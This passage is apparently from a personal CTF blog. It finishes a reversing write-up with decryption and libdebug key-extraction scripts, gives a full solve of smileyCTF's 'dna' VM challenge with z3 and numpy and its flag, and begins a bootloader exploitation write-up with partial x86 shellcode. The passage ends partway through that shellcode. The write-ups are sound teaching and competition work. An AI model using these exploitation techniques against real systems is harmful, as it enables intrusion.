 S[v170] = tmp;

 if (++v171 > 3)
 v171 = 0;
 }

 v168 = 0xa2c473fc; // this is the last value of v168

 do {
 uint32_t v181 = (v168 >> 11) & 0xFF;
 uint32_t v183 = S[v181] + v168;

 uint32_t v179 = (first >> 5) ^ (first << 4);

 uint32_t v180 = v179 + first;

 second -= v180 ^ v183;

 v168-=0x9D175C01; // we are going backwards now

 uint32_t v172 = v168 & 3; // this we have, just decrement v168
 uint32_t v175 = (S[v172] + v168); // this too we have

 uint32_t v176 = ((second << 3) ^ (second >> 3)) + second; // use the decrypted second value to get this value

 first -= v175 ^ v176; // xor this to get the decrypted first value
 v185+=1;

 }
 while (v185 <= 0x478);


 printf("first = 0x%x , second = 0x%x\n", first, second);

 output[0] = first;
 output[1]=second;


}

using it on the cipher 0xF06203EC3D2C5B74 for the level1 with the key extracted using gdb we get

it worked!!

the “auto” part:

to start scripting decryption for the 11423 executables we first need to know what changes between them, opening the second executable and reversing it (just like in the “rev” part) i noticed that four things change:

the key (v91)
the constant that increments v168 is different
the four static values that are calculated inside the loop and used for shifting
and obviously the cipher text

to get the right input for any executable we have to extract these values, but first i updated my decrypt function so it uses dynamic keys, constant and shifts, you can check it here.

to extract the values dynamicly i used libdebug, since it is waaaaay faster than gdb scripting (gdb scripting would have took hours).

Extracting the key

we start by extracting the key, to do that i set a breakpoint at read then return from read and go four instructions after it, to reach the call for the encrypt function

after that i read 4*sizeof(unsigned int) bytes of memory starting at rsi to get the key.

from libdebug import debugger
d = debugger("./beatme")

pipe= d.run()
pipe.send(b'a'*8) # send dummy data so it does not get stuck at read
d.breakpoint('read')

d.cont() # now we are the start of read
d.finish() # return for the read function
for _ in range(4):
 d.step()
# now we are at "call encrypt"
rsi = d.regs.rsi
data = d.memory[rsi:rsi+0x10]
key = [int.from_bytes(data[i:i+4], 'little') for i in range(0, 0x10, 4)]

Extracting the cipher

to extract the cipher from the binary, i noticed that the instructions that do the loading and comparision are always the same

bytes 8b45a83d are the mov instruction and the first byte of cmp instruction, i use these to find their offset in the binary then add 4 and read a dword.

with open(f"./beatme", 'rb') as f:
 filedata = f.read()
a = filedata.find(b'\x8b\x45\xa8\x3d')+4 # mov eax,DWORD PTR [rbp-0x58] ; cmp
b = filedata.find(b'\x8b\x45\xac\x3d')+4 # mov eax,DWORD PTR [rbp-0x54] ; cmp

cipher = int.from_bytes(filedata[a:a+4], 'little') | (int.from_bytes(filedata[b:b+4], 'little') << 32)

Extracting the shift values

now we need to extract the shift values, to do that i decided to set a breakpoint at the end of the pow function and print the value at rax (return value).

breakpoint is set at 0x162f.

i knew by observation the the pow function was the same in all executables, and since we can’t hard code the address of pow cause it changes, i decided to search for the offset of pow by it’s first bytes, and we add the size of it, to reach it’s last instruction.

powstart = b'\xf3\x0f\x1e\xfaUH\x89\xe5\x89}\xec\x89u\xe8\x89U\xe4\x83}\xe8\x00'
addr = filedata.find(powstart)+0x3e # addr points to ret instruction of pow

now we use this to set a breakpoint and print the values at eax

# after the code that extracts the key
d.breakpoint(addr, file='binary')

shifts = []
for _ in range(4):
 d.cont()
 shifts.append(math.log2(d.regs.rax))
 # we use math.log2 since divising by 0x8
 # is the same as shifting to right by 3 (log2(8) == 3)

Extracting the constant that increments v168

now to get the v168 increment constant c, we know from ida that v168 is stored at rbp-0x494, now each loop calls pow 4 times, so in the fifth call of pow (which we are setting a breapoint at), we would be in the second loop, v168 would be incremented one time, it would be equal to the increment constant, so we just get the value at v168.

# after the shifts extraction
d.cont()
rbp = d.regs.rbp
c = int.from_bytes(d.memory[rbp-0x494:rbp-0x494+4], 'little')

and that’s it!

after this we store all the extracted values in files. and we use them in the decryption in c, i did this because my decryption was in c.

here are the final extract.py and decrypt.c scripts.

after running them we get this jpg

writeup for dna chall from smiley ctf 2025

nothoudaifa — Mon, 16 Jun 2025 00:00:00 +0000

TL;DR

This challenge features a vm that takes your flag, treats it as a vector and multiples it by a matrix of constant values, then compares the resulting vector to another vector, if the comparision is correct it prints “CORRECT!”

Initial Analysis

we are given two files: main.cpython-310.pyc which is our python compiled vm and vm.dna which is the vm code, the first thing i did was open https://pylingual.io to get the decompilation of the pyc, it gave me:

# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: main.py
# Bytecode version: 3.10.0rc2 (3439)
# Source timestamp: 2025-06-06 03:24:45 UTC (1749180285)

import marshal
import sys
s = []
m = {}
nm = {'A': 0, 'T': 1, 'G': 2, 'C': 3}
unlucky = [b'\x8coooooooooooonooolooo,ooo\x9cSooo\x06o\x12o\x1bo\x0bnvo\x13o\x0bmSo\x1bo\x0blvo\x13o\x0bnSo\x1bo\x0bkvo\x13o\x0blSo\x1bo\x0bmvo\x13o\x0bkSo\x13o\x0eo\x0bo<oFj!\xb5n;\xb5n.\xb5n(\xb5n,\xc6n\xb5m\x01\x02\xc6n\xb5l\x1b\x02\x1f\xc6o\x1deooo\x95fS\x1a\x01\x03\x1a\x0c\x04\x16Q\xb5h\x1a\x01\x03\x1a\x0c\x04\x16booo\x9ccoookmcncncncngn', b'\x96uuuuuuuuuuuuruuu}uuu6uuu\x86\x11uuu\x11t\x08u\x11w\x08t\x11v\x08w\x11q\x11p\xf1u\tu1u\xf6t\x08v\tu\tt\tw\x13v1u(n\x08q\x01u\x01t\x01w\xd5v\xd4u\xf6t\xf6t1u(e)w\x08p\x08s\tv\tspulu\x01w\tq\tpluluMuvuIu\x04i\x04g\tv\x14w\x11u&u\\s;\xafq426!\xafq!642\xafq6!24\x16tuuuuuuuuuuuwuuusuuu&uuu\x86ouuu\x1cu\tu(|\x08t\tt\x01u\x01t\xd5w\xd4u\xf6t\xe6w\x04w&u\\u\xdcv\xafv\x06\x00\x18\xafw\x1b\x18\xafs\x03\x14\x19\x00\x10\x06\xdcw\xafw[E\xaft\x16\xdcu\x07xuuu\x8f|I\x00\x1b\x19\x00\x16\x1e\x0cK\xafr\x00\x1b\x19\x00\x16\x1e\x0cnuuu\x86wuuuou\x8fh\x00\x1b\x19\x00\x16\x1e\x0c*G[I\x19\x1a\x16\x14\x19\x06K[I\x11\x1c\x16\x01\x16\x1a\x18\x05K\xdcq\xaf|\x10\x1b\x00\x18\x10\x07\x14\x01\x10\xafs\x06\x1a\x07\x01\x10\x11\x07}uuu\xafq\x1e\x10\x0c\x06\xdcr\xafw\x06D\xafw\x06G\xafw\x06F\xafv\x01\x18\x05\xaft\x06\xaft\x1c\x07yuuu\x07xuuu\x07xuuu\x07{uuu\x07zuuucuuu\x86guuuqwqtqt{t{tmtotw\x8a}w', b"\x8aiiiiiiiiiiiihiiiniiijiii\x9a/iii\x1di\rh\xeah\xe0i\xe1i\xc9h\x1di\rk\xeah\xc9k\rj\rm\xedi\x1dj\xc9m\xc8i\xc8k\xc8hhi.i\xeei\x0fh\rl\ro\xeda\ro\x1dl\xeaj\x14i\x15i\x1dj\xeah\x08j\ri:i@n'\xb3o\x1b\x08\x07\r\x06\x04\xb3`\x0f\x1c\x07\n\x1d\x06\x06\x05\x1a\nkiiiiiiiiiiikiiikiii:iii\x9aaiii\x15i\x15h(i:i@h'\xc0i\xc0k\xb3h\x11\xb3h\x10\x1bliii\x1bliii\x93`U\x1c\x07\x05\x1c\n\x02\x10W\xb3n\x1c\x07\x05\x1c\n\x02\x10Miii\x9akiiiai\x93r\x1c\x07\x05\x1c\n\x02\x106ZGU\x05\x06\n\x08\x05\x1aWGU\x05\x08\x04\x0b\r\x08W\niiiiiiiiiiiiiiiijiiiiiii\x9aCiii\x0ci3h\ri3k\xeei\xeeh\x0fk\rh\rk\xeda3j\xeei\x0fh\rj\rm\xeda3m\xeeimi3l:i@l\x93s\x1c\x07\x05\x1c\n\x02\x106ZGU\x05\x06\n\x08\x05\x1aWG\x1c\x07\x05\x1c\n\x02\x10\nkiiiiiiiiiiimiiiliiiziii\x9a-iii\x1di\xeai\xc9h\x15h\xc8hhi\x1dk\rh\xeah\x14k\xe1h\xc9j\x15k\xc8hhi\x1dm\rk\xeah-i4e\x14j\x15h\x15k\x15jpipi\x15i\rh\x15jpiUi\x18z\ri:i@j'\xb3m(*.=\x80miii\xc0l\xb3l\x1a\x1c\x19\x0c\x1b\xb3a66\x00\x07\x00\x1d66\xb3m\x05\x00\x1a\x1d\xb3n\x1a\x01\x1c\x0f\x0f\x05\x0c\xb3l\x1b\x08\x07\x0e\x0c\xc0m\xb3m\x1a\x0c\x05\x0f\xb3n\x04\x08\x19\x19\x00\x07\x0e\xb3m\x02\x0c\x10\x1a\xb3h\x00\xc0k\xb3`66\n\x05\x08\x1a\x1a66\xb3h\x1b\x1bliii\x1b`iii\x1bciiiOiii\x9aeiiiehahcheh\x7fhm\x96\x93J\x1c\x07\x05\x1c\n\x02\x106ZGU\x05\x06\n\x08\x05\x1aWG\x1c\x07\x05\x1c\n\x02\x10G66\x00\x07\x00\x1d66\nkiiiiiiiiiiiliiiliiiziii\x9a;iii\x1di\rh\xeah\x14k\x1di\rk\xeah\x14j`i\x15k\xc9h\rm\xc8h\x14m\x1dk\xeei\x0fh\rl\ro\xeda\x15j\xc9j\x15m\xc8h\xc9m\xc8i\ri\rn\xeckpi-i\xeah\xeah\x1bA\x1dl\xeai\xc9o\xe1i\xc8h:i\x18`@a'\x1bkiii\xb3n\x01\x08\x1a\x01\x05\x00\x0b=\x80Iiii\nhiiiiiiiiiiikiiimiiiZiii\x9auiii\xe8i\x15i4`\x14h\x15h\x1di\xe1i\xeah\x02k?ihi\x18k\ri:i@h'\xc0h\xb3j\x06\x1b\r\xc0k\xb3kGY\x1bniii\xc0h\xb3j\x02\x0c\x10\x1bliii\x1b`iii\x1bciii[iii\x9amiiik\xe9si\x93P\x1c\x07\x05\x1c\n\x02\x106ZGU\x05\x06\n\x08\x05\x1aWG\x1c\x07\x05\x1c\n\x02\x10G66\x0e\x0c\x1d\x00\x1d\x0c\x0466GU\x05\x06\n\x08\x05\x1aWGU\x0e\x0c\x07\x0c\x11\x19\x1bW\x80hiii\xc0n\xb3c66\x00\x04\x19\x06\x1b\x1d66\xb3`\x1b\x08\x07\r\x0b\x10\x1d\x0c\x1a\xb3j\x08\x05\x05\xb3o\x1a\x01\x08[\\_\xb3o\r\x00\x0e\x0c\x1a\x1d\x1bziii\xb3b66\x0e\x0c\x1d\x00\x1d\x0c\x0466\xc0l\x1bpiii\x1bBiii\xb3m\x01\x05\x00\x0b\xb3m\x1b\x05\x00\x0b\xb3h\x0b\xc0h\x1bwiii\x1bCiii\x1b`iii\x1bciiiDiii\x9agiiiahahkhchAhehk\x94\x93O\x1c\x07\x05\x1c\n\x02\x106ZGU\x05\x06\n\x08\x05\x1aWG\x1c\x07\x05\x1c\n\x02\x10G66\x0e\x0c\x1d\x00\x1d\x0c\x0466\xc0o\xb3a66\x07\x08\x04\x0c66\xb3c66\x04\x06\r\x1c\x05\x0c66\xb3e66\x18\x1c\x08\x05\x07\x08\x04\x0c66\x1b}iii\x1b\\iii\xb3d66\n\x05\x08\x1a\x1a\n\x0c\x05\x0566\x1bliii\xc0h\x1bviii\x1bSiii\x1b`iii\x1bciiiLiii\x9aoiiiaigh}n\x1bciii\xc0o\x1bYiii\xb3m\x1a\x0c\x0c\r\xb3o\x1b\x0c\r\x1c\n\x0c\xb3k\x07\x04\xb3o\x1f\x08\x05\x1c\x0c\x1a\xb3m\r\x00\n\x1d\xc0h\x1bciii\x1bliii\x1b+iii\x1b`iii\x1bciiiHiii\x9aaiiiakwh}hey", b'\x82aaaaaaaaaaaacaaagaaa"aaa\x92]aaa&a\x05`\x05c\xe5a\x05c\x15a\xe2b\x1ca&a\x05b\x05e\xe5a\x05e\x15`\x1da\x05d\xece\x1c`\x15c\x05g\x15`\x15b\xe2`\xfaa\x05f\xfcb\xe2``a\x05a2aHi/\x02aaaaaaaaaaaaaaaabaaaaaaa\x92Iaaa\x04a;`\x05a;c\xe6a\x07`\x05`\x05c\xe5i;b\xe6a\x07`\x05b\x05e\xe5i;e\xe6aea;d2aHd\x9bt\x14\x0f\r\x14\x02\n\x18>UO]\r\x0e\x02\x00\r\x12_O,,\x02eaaaaaaaaaaaeaaagaaaraaa\x92saaa\x15a\xe2a\xc1`\x1da\x1d`\x1dc\x1db\xc0e2aH`/\xc8c\xbbd\x12\x14\x11\x04\x13\xbbf>>\x0f\x04\x16>>\xc8e\xbbb\x02\r\x12\xbbe\x0f\x00\x0c\x04\xbbd\x03\x00\x12\x04\x12\xbbb\x05\x02\x15\xc8`\xbbh>>\x02\r\x00\x12\x12>>\xc8a\x9bh]\x14\x0f\r\x14\x02\n\x18_\xbbf\x14\x0f\r\x14\x02\n\x18Zaaa\x92caaas`\x9b|\x14\x0f\r\x14\x02\n\x18>UO]\r\x0e\x02\x00\r\x12_O,,O>>\x0f\x04\x16>>\x02`aaaaaaaaaaafaaadaaa~aaa\x92\x05aaa\x15a\xe2a\x0b`\x1d`\x08a\x1dc\xc5`\xef`\x1cb\x15c\x1db\xc1b\xc0a\xe2`\x1ce\x1de\x05a\x05a\x05`\xe4bxa\x1de\x05c\x05a\x05`\xe4bxava\x1ce\x15e\x15d\x1db\xc1g\xc0a\xe2`\xe2`%a<k=c\x1cd\x1cg\x1de\x1ddxa\x1db\x1dg]a\x10D\x1db2aHb/\x88caaa\x88`aaa\xc8f\x13gaaa\xbbi>>\x02\x00\r\r>>\xbbe\r\x08\x12\x15\xbbg\x17\x00\r\x14\x04\x12\xbbh\x04\x0f\x14\x0c\x04\x13\x00\x15\x04\xbbg\x12\x0e\x13\x15\x04\x05\xbbe\n\x04\x18\x12\xc8f\x13haaa\xbbe\x00\x13\x06\x12\xbbg\n\x16\x00\x13\x06\x12\xbbi\x08\x0f\x12\x15\x00\x0f\x02\x04\xbbe\x17\x00\r\x12\xbb`\x08\xbb`\n\x13laaa\x13naaa\x13qaaa\x13paaa_aaa\x92maaas`m`}`y`o`e`\x9b\x7f\x14\x0f\r\x14\x02\n\x18>UO]\r\x0e\x02\x00\r\x12_O,,O>>\x02\x00\r\r>>\xc8g\xbbi>>\x0f\x00\x0c\x04>>\xbbk>>\x0c\x0e\x05\x14\r\x04>>\xbbm>>\x10\x14\x00\r\x0f\x00\x0c\x04>>\x13faaa\x13yaaa\xbbl>>\x02\r\x00\x12\x12\x02\x04\r\r>>\x13naaa\x13naaa\x13laaa\x13qaaa\x13paaa[aaa\x92gaaaiam`ub\xbbc,,\x02aaaaaaaaaaaaaaaa`aaa!aaa\x92maaa\x04a;`\x05a;c\x05`2aHc\x9bt\x14\x0f\r\x14\x02\n\x18>UO]\r\x0e\x02\x00\r\x12_O,%/\xc8b\x13Iaaa\x13Haaa\x13Kaaa\x13naaa\x13naaa\x13naaa\x13qaaa\x13paaa\'aaa\x92eaaaiae`\xbbc,%\xc8`\xbbh\x0c\x04\x15\x00\x02\r\x00\x12\x12\x9b@\x06\r\x0e\x03\x00\r\x12IH:F\x0f\x14\x02\r\x04\x0e\x15\x08\x05\x04>\x0c\x00\x11F<A\\A,%I\x9b`H\xc8e\xbbe\x15\x18\x11\x04\xbbe\x05\x08\x02\x15\xbbe\x04\x19\x04\x02\xbbc\x0f\x0c\xc8c\x13Laaa\x13Saaa\x13naaa\x13naaa\x13qaaa\x13paaaVaaa\x92gaaaqbumyb']
trans = lambda s: sum((nm[c] << 2 * i for i, c in enumerate(s)))
if len(sys.argv)!= 2:
 print(f'Usage: {sys.argv[0]} <dna_file>')
 sys.exit(1)
code = open(sys.argv[1]).read()
flag = input('> ').encode()
if len(flag)!= 56:
 exit('WRONG!')
if flag[:6]!= b'.;,;.{':
 exit('WRONG!')
if flag[(-1)]!= 125:
 exit('WRONG!')
flag = flag[6:(-1)]
for i in range(len(flag)):
 m[640 + i] = flag[i]
pc = 0
while pc < len(code):
 pri, pro = map(trans, [code[pc:pc + 2], code[pc + 2:pc + 12]])

 @pri
 case 0:
 s.append(pro)
 pc += 12
 else: # inserted
 case 1:
 if not s:
 raise Exception('Stack underflow')
 s.pop()
 pc += 2
 else: # inserted
 case 2:
 if pro not in m:
 raise Exception(f'Uninitialized memory access at {pro}')
 s.append(m[pro])
 pc += 12
 else: # inserted
 case 3:
 if not s:
 raise Exception('Stack underflow')
 m[pro] = s.pop()
 pc += 12
 else: # inserted
 case 4:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 s.append(a + b)
 pc += 2
 else: # inserted
 case 5:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 s.append(b - a)
 pc += 2
 else: # inserted
 case 6:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 s.append(a * b)
 pc += 2
 else: # inserted
 case 7:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 if a == 0:
 raise Exception('Division by zero')
 s.append(b % a)
 pc += 2
 else: # inserted
 case 8:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 s.append(1 if a == b else 0)
 pc += 2
 else: # inserted
 case 9:
 pc = pro
 else: # inserted
 case 10:
 if not s:
 raise Exception('Stack underflow')
 if s.pop() == 1:
 pc = pro
 else: # inserted
 pc += 12
 else: # inserted
 case 11:
 if not s:
 raise Exception('Stack underflow')
 if s.pop()!= 1:
 pc = pro
 else: # inserted
 pc += 12
 else: # inserted
 case 12:
 if not s:
 raise Exception('Stack underflow')
 print(chr(s.pop()), end='')
 pc += 2
 else: # inserted
 case 13:
 if not s:
 raise Exception('Stack underflow')
 key = s.pop()

 def f():
 return
 f.__code__ = marshal.loads(bytes([b ^ key for b in unlucky.pop(0)]))
 f()
 pc += 2
 else: # inserted
 case 14:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 if a not in nm or b not in nm:
 raise Exception('Invalid')
 nm[a], nm[b] = (nm[b], nm[a])
 pc += 2
 else: # inserted
 case 15:
 break

we can see that it’s a simple stack based vm, the flag is loaded at 0x280, next thing i did was to make a disasembler for the vm, you can check it in here

it gave me the following diassembly (truncated):

0x0 PUSH [0x280]
0xc PUSH 0x6a
0x18 MULT
0x1a PUSH [0x281]
0x26 PUSH 0x1b
0x32 MULT
...
0x4e0 PUSH [0x2b0]
0x4ec PUSH 0xa1
0x4f8 MULT
0x4fa ADD
0x4fc ADD
...
0x558 ADD
0x55a [0x1000] = POP
0x566 PUSH [0x280]
0x572 PUSH 0x38
0x57e MULT
...
0x3b62 PUSH [0x29a]
0x3b6e CALL MARSHAL
0x3b70 CALL MARSHAL
0x3b72 HALT
0x3b74 MOD
0x3b76 CALL MARSHAL
0x3b78 HALT
0x3b7a HALT
0x3b7c HALT
0x3b7e JMP 0x1fffe IF POP != 1
0x3b8a CALL MARSHAL
0x3b8c PUTC(POP)
0x3b8e MOD
0x3b90 CALL MARSHAL

the first thing i noticed is that it is taking chars of the flag and multiplying them with constants then adds them, this is a dot product (which made me pretty convinced it a linear system, i didn’t use this in my first solve tho), after that it is invoking instruction 14, which calls marshal code using a key, in this case the key is a flag char, i didn’t reverse the python bytecode when solving the chall, afrer that it does some stuff, at this point i got tired of reading the disassembly and decided to make my own emulator so i can debug it, you can find it here

after running the vm with an example flag i got this

$ py vm.py ./dna/vm.dna
> .;,;.{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
MARSHAL: 65
Traceback (most recent call last):
 File "/home/player/ctfs/smiley/dna/vm.py", line 117, in <module>
 f.__code__ = marshal.loads(bytes([b ^ key for b in unlucky.pop(0)]))
ValueError: bad marshal data (unknown type code)

this is because the key (which is a character from the flag) is wrong, after bruteforcing the keys until i got no error i was left with

.;,;.{AAAAAAAAAAAAAAAAAAAAAAiAAAouAAAAAaAAAAAAAAAAAAAAA}

now running the vm again we get:

MARSHAL: 111
MARSHAL: 117
MARSHAL: 105
MARSHAL: 97
CMPEQ 0xa8f2c 0x6b0ce
CMPEQ 0x952d6 0x60833
CMPEQ 0xa0cf4 0x67b2e
CMPEQ 0x87e87 0x576cb
CMPEQ 0x8fbb8 0x5d2be
CMPEQ 0x996f6 0x62e12
CMPEQ 0xa0eba 0x65f0d
CMPEQ 0x981a4 0x61bd6
CMPEQ 0x90214 0x5ec71
CMPEQ 0xa3c6f 0x67bc8
CMPEQ 0xb36f0 0x7396d
CMPEQ 0xa9750 0x6e79d
CMPEQ 0xa4697 0x6d0f2
CMPEQ 0xa52a5 0x682f8
CMPEQ 0x9bd69 0x65dc8
CMPEQ 0xb24c1 0x71555
CMPEQ 0x9f053 0x64bbf
CMPEQ 0x95a53 0x646a9
CMPEQ 0x95e95 0x5fc1a
CMPEQ 0xb0750 0x6f3f5
CMPEQ 0xa1ad8 0x64911
CMPEQ 0x949d0 0x5f763
CMPEQ 0x922ab 0x5e00f
CMPEQ 0x990f4 0x6058c
CMPEQ 0xa0e4a 0x674f6
CMPEQ 0x8749a 0x57963
CMPEQ 0x9931c 0x613df
CMPEQ 0x97981 0x5f156
CMPEQ 0xa01c2 0x67f51
CMPEQ 0x92057 0x5c18d
CMPEQ 0xa24ad 0x67e15
CMPEQ 0xbcae1 0x7a2d5
CMPEQ 0xad88c 0x711d2
CMPEQ 0xa3833 0x6742d
CMPEQ 0x8cce6 0x5ba3b
CMPEQ 0xaecb6 0x6e958
CMPEQ 0xa6859 0x6bab8
CMPEQ 0xa7cac 0x6cd1e
CMPEQ 0xc4c8d 0x7ecc5
CMPEQ 0xa1427 0x66c4d
CMPEQ 0xb1df7 0x72a1f
CMPEQ 0xa8600 0x6bd4d
CMPEQ 0xb652c 0x7820c
CMPEQ 0x91f28 0x5f805
CMPEQ 0x99b79 0x61bf0
CMPEQ 0x8edb6 0x5d3e6
CMPEQ 0xa5c30 0x68bde
CMPEQ 0xa26ea 0x68231
CMPEQ 0xad889 0x70f95
CMPEQ 0x31 0x0
JMP 0x10ebc IF POP != 1
PUTC(POP)
WPUTC(POP)
RPUTC(POP)
OPUTC(POP)
NPUTC(POP)
GPUTC(POP)
!PUTC(POP)

it printed wrong, it did 49 comparisions (here i was sure that it is comparing the resulting vectors from the matrix multiplication of the linear system), it prints “WRONG!” if at least one fails.

The First solution (unintended)

after looking at the comparisions i decided to use z3, by supplying a symbolic flag then adding constraints when the comparisions happen the script is here the script defines the flag as a list of symbolic 8 bitvecs (leaving the keys for the marshal code) using

flag= b".;,;.{AAAAAAAAAAAAAAAAAAAAAAiAAAouAAAAAaAAAAAAAAAAAAAAA}"
flag = list(flag[6:(-1)])
for i in range(len(flag)):
 if flag[i] == ord('A'):
 flag[i]= BitVec(f'bv_{i}', 8)

and the cmp instruction is now like this:

elif pri == 8:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 s.append(1 if a == b else 0)
 # this check is for the last comparision, in here i run the z3 check
 if type(a) == int and type(b) == int and a == 49:
 if sol.check() == sat:
 model = sol.model()
 print('.;,;,{', end='')
 for i in range(49):
 try:
 print(chr(model[flag[i]].as_long()),end='')
 except (KeyError,IndexError):
 print(chr(flag[i]), end='')
 print('}')
 else:
 print('unsat')
 exit(0)
 # otherwise just add the constraint
 sol.add(a == b)
 pc+=2

i run it and get the flag: .;,;,{we_ought_to_start_storing_our_data_as_dna_instead}

The Second Solution (intended) (after the ctf ended)

i talked before about it being a linear system, in this solve i tried to extract the values of the matrix and the result vector to solve this system, the reason i used z3 in the first solution is because i couldn’t extract all the matrix values from the disassembly (the first part of it has only 11 rows), after the ctf ended i thought of an idea, by multiplying a matrix with a vector/input flag (1, 0, 0 …) the resulting vector will be the first column of the matrix

and since i can extract the resulting vector, i can extract each column of the matrix, i just needed a bit of scripting.

since i am setting all the flag bytes to 0, i had to hard code the keys in instruction 14 like this

elif pri == 13:
 if not s:
 raise Exception('Stack underflow')
 key = s.pop()

 if len(unlucky) == 4:
 key = 111
 elif len(unlucky) == 3:
 key = 117
 elif len(unlucky) == 2:
 key = 105
 elif len(unlucky) == 1:
 key = 97
 print("MARSHAL: ", key)
 def f():
 return
 f.__code__ = marshal.loads(bytes([b ^ key for b in unlucky.pop(0)]))
 f()
 pc+=2

to extract the columns and the result vector i used this:

matrix = np.zeros((49, 49), dtype=int) # matrix of values
rslt = np.zeros((49), dtype=int) # the compared vector
...
flag = list(b'\x00'*49)
flag[index] = 1
...

elif pri == 8:
 if len(s) < 2:
 raise Exception('Stack underflow')
 a, b = (s.pop(), s.pop())
 s.append(1 if a == b else 0)
 if a == 0x31 and b == 0:
 if index == 0:
 rslt[:] = e
 # this is the last comparision, break at it
 matrix[:, index] = column
 print(index, column, e)
 break
 else:
 if index == 0:
 e.append(a)
 column.append(b)
 print(f"CMPEQ {hex(a)} {hex(b)}")
 pc+=2

after extracting the values we can solve and print the flag using a simple linalg.solve from numpy:

flag = np.linalg.solve(matrix, rslt)
print(''.join(chr(round(val)) for val in flag))

full script here

after running it i get the flag: .;,;,{we_ought_to_start_storing_our_data_as_dna_instead}

bootflop chall writeup from ingehack 4.0

nothoudaifa — Wed, 26 Feb 2025 00:00:00 +0000

challenge author: itskarudo
points: 493
desc: i love esolangs, i love bootloaders.

this challenge gives a custom bootloader that you have to exploit.

we are given two files run.sh and bootflop.img (which is the bootloader image)

first thing i did was running xxd on bootflop.img:

00000000: fc31 d2c7 0622 7d26 7dbf 567d c706 247d .1..."}&}.V}..$}
00000010: 567d b03e e8f8 00b0 20e8 f300 e8f5 003c V}.>.... ......<
00000020: 7f74 0baa 3c0d 741e 3c0a 741a ebee 81ff .t..<.t.<.t.....
00000030: 567d 74e8 4fb0 08e8 d500 b020 e8d0 00b0 V}t.O...... ....
00000040: 08e8 cb00 ebd6 b00a e8c4 00ff 0e24 7dff .............$}.
00000050: 0624 7d8b 3624 7d80 3c2b 742a 803c 2d74 .$}.6$}.<+t*.<-t
00000060: 2d80 3c3e 7430 803c 3c74 3180 3c2e 7432 -.<>t0.<<t1.<.t2
00000070: 803c 2c74 3880 3c5b 7443 803c 5d74 66b0 .<,t8.<[tC.<]tf.
00000080: 0ae8 8b00 eb83 8b36 227d fe04 ebc1 8b36 .......6"}.....6
00000090: 227d fe0c ebb9 ff06 227d ebb3 ff0e 227d "}......"}...."}
000000a0: ebad 8b36 227d 8a04 e864 00eb a2e8 6400 ...6"}...d....d.
000000b0: 8b36 227d 8804 b00a e854 00eb 928b 3622 .6"}.....T....6"
000000c0: 7d80 3c00 7589 b901 00ff 0624 7d8b 3624 }.<.u......$}.6$
000000d0: 7d80 3c5b 7501 4180 3c5d 7501 4983 f900 }.<[u.A.<]u.I...
000000e0: 75e7 e96a ff8b 3622 7d80 3c00 0f84 5fff u..j..6"}.<..._.
000000f0: b901 00ff 0e24 7d8b 3624 7d80 3c5d 7501 .....$}.6$}.<]u.
00000100: 4180 3c5b 7501 4983 f900 75e7 e940 ffba A.<[u.I...u..@..
00000110: f803 eec3 bafd 03ec a801 74f8 80ea 05ec ..........t.....
00000120: eec3 0000 0000 0000 0000 0000 0000 0000 ................
00000130: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000140: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000150: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000160: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000170: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000180: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000190: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000001f0: 0000 0000 0000 0000 0000 0000 0000 55aa ..............U.
00000200: 696e 6765 6861 636b 7b66 616b 655f 666c ingehack{fake_fl
00000210: 6167 7d ag}

we can see that the flag is at 0x200, from my experience in writing a simple bootloader i knew that:

only the first 0x200 (the bootsector) bytes of the image will be loaded at 0x7c00.
to read the rest of the image (the flag) i need to read from the disk using bios interrupts, which means i need to be able to run my own shellcode.

after that, i disassembled the bootloader image using

objdump -D -b binary -m i8086 bootflop.img -M intel

i gave the disassembly to chatgpt, and it told me

- this program is Brainfuck interpreter.
- 0x7D22 is initialized as a pointer to the memory tape.
- 0x7D24 is initialized as a pointer to the input program.
- it continuously reads and executes Brainfuck commands.
- it uses serial ports (which are mapped to stdio in run.sh) to input and output data
- it has 8 commands:
 + (0x2B): Increments the byte at the current memory cell.
 - (0x2D): Decrements the byte at the current memory cell.
 > (0x3E): Moves the pointer to the right.
 < (0x3C): Moves the pointer to the left.
 . (0x2E): Outputs the byte at the current memory cell.
 , (0x2C): Inputs a byte and stores it at the current memory cell.
 [ (0x5B): Loops while the current memory cell is nonzero.
 ] (0x5D): Jumps back to the matching [ if the memory cell is nonzero.

The vulnerability:

the vulnerability lies in the < and > commands, the bootloader does not check if we go out of bounds of the memory tape (which starts at 0x7d26, check assembly), we can write into bootloader executable code and it will run just fine.

Exploitation:

the exploitation part is simple, write shellcode into memory, then write (or overwrite) a jmp instruction so it jumps to our shellcode.

using chatgpt i got the following shellcode that reads the sector (which is the flag) into 0x7a00 then outputs it to serial com1

org 0x7C00

 mov ah, 0x02 ; BIOS read sector function
 mov al, 0x01 ; Read 1 sector
 mov ch, 0x00 ; Cylinder 0
 mov cl, 0x02 ; Sector 2 (1-based index)
 mov dh, 0x00 ; Head 0
 mov dl, 0x80 ; Drive 0x80 (first hard disk)
 mov bx, 0x7a0 ; Load sector into 0x7a00
 mov es, bx ; Set ES to 0x7a0 (this is a segment to it will be multiplied by 0x10)
